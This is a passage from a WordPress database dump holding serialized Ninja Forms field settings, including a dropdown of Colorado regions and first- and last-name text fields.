dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8792,212,'field_label','First Name','field_label','First Name'),(8793,212,'field_key','textbox_166','field_key','textbox_166'),(8794,212,'custom_name_attribute','','custom_name_attribute',''),(8795,212,'personally_identifiable','','personally_identifiable',''),(8796,212,'value','','value',''),(8797,213,'field_label','Last Name','field_label','Last Name'),(8798,213,'field_key','lastname_167','field_key','lastname_167'),(5879,204,'key','listselect_158','key','listselect_158'),(5880,204,'container_class','one-half first','container_class','one-half first'),(5881,204,'parent_id','19','parent_id','19'),(12278,381,'required','1','required','1'),(12279,381,'options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please 